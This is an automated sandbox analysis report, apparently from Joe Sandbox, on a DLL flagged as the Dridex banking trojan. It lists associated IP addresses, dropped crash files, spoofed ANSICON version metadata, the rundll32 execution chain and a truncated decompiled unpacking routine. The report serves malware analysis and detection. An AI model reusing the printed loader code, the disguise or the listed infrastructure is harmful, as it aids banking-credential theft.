Classification:	mal80.bank.troj.evad.winDLL@8/4@0/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 99.7% (good quality ratio 94.3%) Quality average: 79.4% Quality standard deviation: 27.6%
HCA Information:	Successful, ratio: 84% Number of executed functions: 24 Number of non-executed functions: 7
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe

Simulations

Behavior and APIs

Time	Type	Description
23:38:37	API Interceptor	1x Sleep call for process: loaddll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
159.203.93.122	RuRxpMUPN7.dll	Get hash	malicious	Browse
	qMus8K6kXx.dll	Get hash	malicious	Browse
	gsG7jGFk3I.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	9JXXdpfiQm.dll	Get hash	malicious	Browse
	t4KzTUSzkx.dll	Get hash	malicious	Browse
	POQ6m91rE7.dll	Get hash	malicious	Browse
	4ryCxciDFA.dll	Get hash	malicious	Browse
	9JXXdpfiQm.dll	Get hash	malicious	Browse
	t4KzTUSzkx.dll	Get hash	malicious	Browse
	POQ6m91rE7.dll	Get hash	malicious	Browse
50.116.27.97	RuRxpMUPN7.dll	Get hash	malicious	Browse
	qMus8K6kXx.dll	Get hash	malicious	Browse
	gsG7jGFk3I.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	9JXXdpfiQm.dll	Get hash	malicious	Browse
	t4KzTUSzkx.dll	Get hash	malicious	Browse
	POQ6m91rE7.dll	Get hash	malicious	Browse
	4ryCxciDFA.dll	Get hash	malicious	Browse
	9JXXdpfiQm.dll	Get hash	malicious	Browse
	t4KzTUSzkx.dll	Get hash	malicious	Browse
	POQ6m91rE7.dll	Get hash	malicious	Browse
94.247.168.64	RuRxpMUPN7.dll	Get hash	malicious	Browse
	qMus8K6kXx.dll	Get hash	malicious	Browse
	gsG7jGFk3I.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	9JXXdpfiQm.dll	Get hash	malicious	Browse
	t4KzTUSzkx.dll	Get hash	malicious	Browse
	POQ6m91rE7.dll	Get hash	malicious	Browse
	4ryCxciDFA.dll	Get hash	malicious	Browse
	9JXXdpfiQm.dll	Get hash	malicious	Browse
	t4KzTUSzkx.dll	Get hash	malicious	Browse
	POQ6m91rE7.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DIGITALOCEAN-ASNUS	RuRxpMUPN7.dll	Get hash	malicious	Browse	159.203.93.122
	qMus8K6kXx.dll	Get hash	malicious	Browse	159.203.93.122
	gsG7jGFk3I.dll	Get hash	malicious	Browse	159.203.93.122
	15sV4KdrCN.dll	Get hash	malicious	Browse	159.203.93.122
	Ce28zthEz1.dll	Get hash	malicious	Browse	159.203.93.122
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	159.203.93.122
	1UmI5PSg3K.dll	Get hash	malicious	Browse	159.203.93.122
	9eYYTTlVYi.dll	Get hash	malicious	Browse	159.203.93.122
	Ce28zthEz1.dll	Get hash	malicious	Browse	159.203.93.122
	15sV4KdrCN.dll	Get hash	malicious	Browse	159.203.93.122
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	159.203.93.122
	1UmI5PSg3K.dll	Get hash	malicious	Browse	159.203.93.122
	9eYYTTlVYi.dll	Get hash	malicious	Browse	159.203.93.122
	9JXXdpfiQm.dll	Get hash	malicious	Browse	159.203.93.122
	t4KzTUSzkx.dll	Get hash	malicious	Browse	159.203.93.122
	POQ6m91rE7.dll	Get hash	malicious	Browse	159.203.93.122
	4ryCxciDFA.dll	Get hash	malicious	Browse	159.203.93.122
	9JXXdpfiQm.dll	Get hash	malicious	Browse	159.203.93.122
	t4KzTUSzkx.dll	Get hash	malicious	Browse	159.203.93.122
	POQ6m91rE7.dll	Get hash	malicious	Browse	159.203.93.122
LINODE-APLinodeLLCUS	RuRxpMUPN7.dll	Get hash	malicious	Browse	50.116.27.97
	qMus8K6kXx.dll	Get hash	malicious	Browse	50.116.27.97
	gsG7jGFk3I.dll	Get hash	malicious	Browse	50.116.27.97
	15sV4KdrCN.dll	Get hash	malicious	Browse	50.116.27.97
	Ce28zthEz1.dll	Get hash	malicious	Browse	50.116.27.97
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	50.116.27.97
	1UmI5PSg3K.dll	Get hash	malicious	Browse	50.116.27.97
	9eYYTTlVYi.dll	Get hash	malicious	Browse	50.116.27.97
	Ce28zthEz1.dll	Get hash	malicious	Browse	50.116.27.97
	15sV4KdrCN.dll	Get hash	malicious	Browse	50.116.27.97
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	50.116.27.97
	1UmI5PSg3K.dll	Get hash	malicious	Browse	50.116.27.97
	9eYYTTlVYi.dll	Get hash	malicious	Browse	50.116.27.97
	9JXXdpfiQm.dll	Get hash	malicious	Browse	50.116.27.97
	t4KzTUSzkx.dll	Get hash	malicious	Browse	50.116.27.97
	POQ6m91rE7.dll	Get hash	malicious	Browse	50.116.27.97
	4ryCxciDFA.dll	Get hash	malicious	Browse	50.116.27.97
	9JXXdpfiQm.dll	Get hash	malicious	Browse	50.116.27.97
	t4KzTUSzkx.dll	Get hash	malicious	Browse	50.116.27.97
	POQ6m91rE7.dll	Get hash	malicious	Browse	50.116.27.97
GLESYS-ASSE	RuRxpMUPN7.dll	Get hash	malicious	Browse	94.247.168.64
	qMus8K6kXx.dll	Get hash	malicious	Browse	94.247.168.64
	gsG7jGFk3I.dll	Get hash	malicious	Browse	94.247.168.64
	15sV4KdrCN.dll	Get hash	malicious	Browse	94.247.168.64
	Ce28zthEz1.dll	Get hash	malicious	Browse	94.247.168.64
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	94.247.168.64
	1UmI5PSg3K.dll	Get hash	malicious	Browse	94.247.168.64
	9eYYTTlVYi.dll	Get hash	malicious	Browse	94.247.168.64
	Ce28zthEz1.dll	Get hash	malicious	Browse	94.247.168.64
	15sV4KdrCN.dll	Get hash	malicious	Browse	94.247.168.64
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	94.247.168.64
	1UmI5PSg3K.dll	Get hash	malicious	Browse	94.247.168.64
	9eYYTTlVYi.dll	Get hash	malicious	Browse	94.247.168.64
	9JXXdpfiQm.dll	Get hash	malicious	Browse	94.247.168.64
	t4KzTUSzkx.dll	Get hash	malicious	Browse	94.247.168.64
	POQ6m91rE7.dll	Get hash	malicious	Browse	94.247.168.64
	4ryCxciDFA.dll	Get hash	malicious	Browse	94.247.168.64
	9JXXdpfiQm.dll	Get hash	malicious	Browse	94.247.168.64
	t4KzTUSzkx.dll	Get hash	malicious	Browse	94.247.168.64
	POQ6m91rE7.dll	Get hash	malicious	Browse	94.247.168.64

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_c7ca2540c4b6526dfdf44662714aed219cc3cf7_160cf2be_126ae707\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	9242
Entropy (8bit):	3.7619547331852683
Encrypted:	false
SSDEEP:	96:2oZiqlHXoXyHy9hAnC5Q56tpXIQcQ6c6n+hcEZcw3P+a+z+HbHg+6eugtYsaV9wG:Ke3XcHUb+hjbjVq/u7s+S274Itb2p
MD5:	E8466A7FBDC7C29D4122AB91D23AA39F
SHA1:	614E0E6F2C99717CD3C9ED18747C6E2C1D187AC1
SHA-256:	5C53E377256E4EC4CCDA144146686849AAF0EED21C2EACCA8488002FA58EB135
SHA-512:	BE7CE53D088F685D60800DBD80EF23DE65AE6BEED415CF0453771A4DA3F7143396D7F152D97F258E82BA9C17D92F0F621ED1597E6DD8B2C05C61952F7EDAD5CB
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.3.3.7.4.3.2.6.7.5.8.3.6.9.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.e.b.1.c.d.d.f.-.d.5.7.4.-.4.1.3.3.-.b.1.d.9.-.3.9.f.5.6.7.2.2.3.d.8.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.d.5.3.9.1.1.0.-.b.f.8.f.-.4.e.9.6.-.b.b.2.4.-.6.c.5.d.4.2.b.4.c.a.e.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.6.8.-.0.0.0.1.-.0.0.1.7.-.a.a.a.f.-.d.f.b.6.a.f.3.5.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.4././.0.4.:.1.0.:.5.0.:.5.4.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBC3D.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Apr 20 06:38:49 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	45538
Entropy (8bit):	1.9912521919477428
Encrypted:	false
SSDEEP:	384:Y8+46BoE7EU4/m4WPZrWyaKJhpHpulnn1hlkXtVTw:Y8+46BoE7EU4/m4GrWjKJhpHIlnn1+VU
MD5:	5F6E973DF186BCADCDBBF784A6B28E71
SHA1:	5097E9FD045DA019B2058F1AA03614ADBA8A95DB
SHA-256:	DEF5F9F8B3A4DBC1F1D6D4DD556664CFBF0F846E5FEF09FFEA3D30FAA18E3BB7
SHA-512:	0D5A361D38CAF6A9D01F3C9681769058AAA26F82B816C75669D91BD4C4B288B1F1EEAD5AD8DD53540BA3F34EDF69E2FF8E4774025B9DDAF457EEB5FE0CCF91E9
Malicious:	false
Reputation:	low
Preview:	MDMP....... ........v~`...................U...........B..............GenuineIntelW...........T.......h....v~`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC68F.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8366
Entropy (8bit):	3.6927315670526486
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNi666GAa6YJ9SUhgmfoS1pCpBa89b75nsfHJ5m:RrlsNif6GAa6YjSUhgmfoS1A75sfp0
MD5:	C553F0F653FFDD44515CCAA215F9994F
SHA1:	73E0ED0A37EFB4DBC5B9520CD26916FB27885989
SHA-256:	6C3A48194FA0E965462B6A4B095407DE513A50074F3487117A26421A5B6EDCBA
SHA-512:	723F8F8373842EBEECE3801004BDDA13542DD9C7A3FC2AC86EA86035D1FFA49D20BEC86B2526BD95F19D0726EC28C7F9FF5BF1ABD1507D155E2D22EB21C5A5AD
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.1.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD14E.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4658
Entropy (8bit):	4.434256434558449
Encrypted:	false
SSDEEP:	48:cvIwSD8zsvJgtWI93HWSC8Bqs8fm8M4JVrRFi+q8v7rKKKcQIcQw6UrBd:uITfR42SNQJUKaKKkw68Bd
MD5:	7990971C2C150E566198AF9EC91E6C06
SHA1:	EE017A035264D232FB42F6042CCCCBCD7CB7CF3B
SHA-256:	142A7A580A08B454809BBB5C5197E544876AE453CC6891226E83AF7DE775117F
SHA-512:	E028911BCD694A7618336A2011BE96CBFA57D38D8446212E41D6A8F139E39449E513115D1829E355F832DCDDDDA133A4091F32EC1C47F3D473AECE06CAF1CCCD
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="954229" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.548558116726497
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	BJKPKLUPiD.dll
File size:	163840
MD5:	ffc39c266b67da9e1847106d0adc566b
SHA1:	37f852cd92c6191ae6b34ffb6ce69646b09b2900
SHA256:	b3bc5083836846848f682dc1a2ab091ac3c5256d6924952232c524287911d6fd
SHA512:	2632da6673fa8b216aaacb8c68a8b9928c37bdf2b3beec050d6b6189c494b12e1b5e6137a9f97900db50f4a5e4c9bc741d56cfc39c398d2aab4138a88f0340d6
SSDEEP:	3072:NWX2IjzzpM+PncPeY8+O3AU3HRIHPh3UGfXy0BHNkIv/ScbQQ2y0iNM0+y+N0tc:N42IfzNPnoeY8j3AsHGPXpHNj6rByM3
File Content Preview:	MZ......................@...........................................[}..[}..[}..[}...}..@.2..\|..=.T..}....S.z\|..@..._}..\|...T\|..V/C..\|..V/E..\|..Rich[}..............PE..L.....}`...........!.........f.......D.......P....@....................................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x424410
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x607DE4E5 [Mon Apr 19 20:15:33 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	b84fd50f2389cfd5bd83e2cf062986d1

Entrypoint Preview

Instruction
mov edx, 00000000h
mov edx, 00000000h
cmpss xmm1, xmm2, 03h
sub eax, 00002233h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
cmpss xmm1, xmm2, 03h
cmp edx, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
je 00007FE5C5108ECBh
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x1001	0x0	.text
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2768c	0x59	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2c000	0x340	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2d000	0x14c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x25040	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x25000	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2356e	0x23600	False	0.761560015459	data	7.55877156847	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x25000	0x2842	0x2a00	False	0.791573660714	data	7.53164670284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.pdata	0x28000	0x3588	0x1600	False	0.783380681818	MMDF mailbox	7.34765964879	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x2c000	0x340	0x400	False	0.390625	data	2.73456990044	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2d000	0x14c	0x200	False	0.62890625	data	4.21021599876	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x2c060	0x2e0	data	English	United States

Imports

DLL	Import
KERNEL32.dll	CloseHandle, OpenSemaphoreW, LoadLibraryExA, GetModuleHandleW, OutputDebugStringA, GetProfileSectionW
OPENGL32.dll	glTexSubImage1D
ole32.dll	CreateStreamOnHGlobal
USER32.dll	TranslateMessage
ADVAPI32.dll	RegLoadAppKeyW

Version Infos

Description	Data
LegalCopyright	Freeware
InternalName	ANSI32
FileVersion	1.66
CompanyName	Jason Hood
Comments	http://ansicon.adoxa.vze.com/
ProductName	ANSICON
ProductVersion	1.66
FileDescription	ANSI Console
OriginalFilename	ANSI32.dll
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 7016 Parent PID: 5972

General

Start time:	23:38:03
Start date:	19/04/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\BJKPKLUPiD.dll'
Imagebase:	0xf60000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 7032 Parent PID: 7016

General

Start time:	23:38:03
Start date:	19/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\BJKPKLUPiD.dll',#1
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 7060 Parent PID: 7032

General

Start time:	23:38:04
Start date:	19/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\BJKPKLUPiD.dll',#1
Imagebase:	0x1390000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000002.591905429.0000000070991000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4628 Parent PID: 7016

General

Start time:	23:38:37
Start date:	19/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\BJKPKLUPiD.dll',ReadLogRecord
Imagebase:	0x1390000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000004.00000002.591554766.0000000070991000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 4692 Parent PID: 7016

General

Start time:	23:38:39
Start date:	19/04/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7016 -s 428
Imagebase:	0x120000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 7016 Parent PID: 5972 loaddll32.exeCOMMON

Executed Functions

Function 00972213, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E00972213(long __ebx, long __edi, void* __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v72;
				char* _v76;
				int _v80;
				long _v84;
				long _v88;
				DWORD* _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				void* _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				char* _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				int _v168;
				char* _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr* _t136;
				int _t143;
				int _t151;
				int _t155;
				intOrPtr _t170;
				int _t177;
				void* _t226;
				intOrPtr _t229;
				intOrPtr _t234;
				void* _t236;
				intOrPtr* _t240;
				intOrPtr _t247;
				intOrPtr _t251;
				DWORD* _t264;
				void* _t268;
				intOrPtr* _t271;
				intOrPtr* _t272;

				_t136 = _a4;
				_v20 = 0;
				_t236 =  *((intOrPtr*)(_t136 + 0x40));
				 *0x974418 = 1;
				asm("movaps xmm0, [0x973010]");
				asm("movups [0x974428], xmm0");
				_v48 = _t136;
				_v52 =  *((intOrPtr*)(_t136 + 0x64));
				_v56 =  *((intOrPtr*)(_v48 + 8));
				_v184 = _t236;
				_v60 =  *((intOrPtr*)(_v48 + 0x50));
				_v180 = _v52;
				_v176 = 4;
				_v172 =  &_v20;
				_v64 =  *((intOrPtr*)(_t136 + 0x60));
				_v68 = 4;
				_v72 = _t236;
				_v76 =  &_v20;
				_t143 = VirtualProtect(__esi, __edi, __ebx, _t264); // executed
				_v80 = _t143;
				_v184 = _v72;
				_v180 = 0;
				_v176 =  *((intOrPtr*)(_v48 + 0x64));
				_v84 = 0x400;
				_v88 = 2;
				_v92 =  &_v20;
				_v96 = 0;
				E00972569();
				E00971D28(_v72,  *((intOrPtr*)(_v48 + 0xc)), _v56);
				E00972569( *((intOrPtr*)(_v48 + 0xc)), 0, _v56);
				_t151 = VirtualProtect(_v72, 0x400, 2, _v92); // executed
				_t271 = _t268 - 0x88;
				_t226 = _v72;
				_t251 =  *((intOrPtr*)(_t226 + 0x3c));
				_v100 = _t151;
				_v104 = _v72 + 0x3c;
				_v108 = _t226;
				_v112 = _t251;
				if(_t251 != 0) {
					_v108 = _v72 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v144 = _v108;
				if(_v60 != 0) {
					_v148 = 0;
					_v152 = _v144 + 0x18 + ( *(_v144 + 0x14) & 0x0000ffff);
					while(1) {
						_t170 = _v152;
						_v160 = _t170;
						_t247 = _v160;
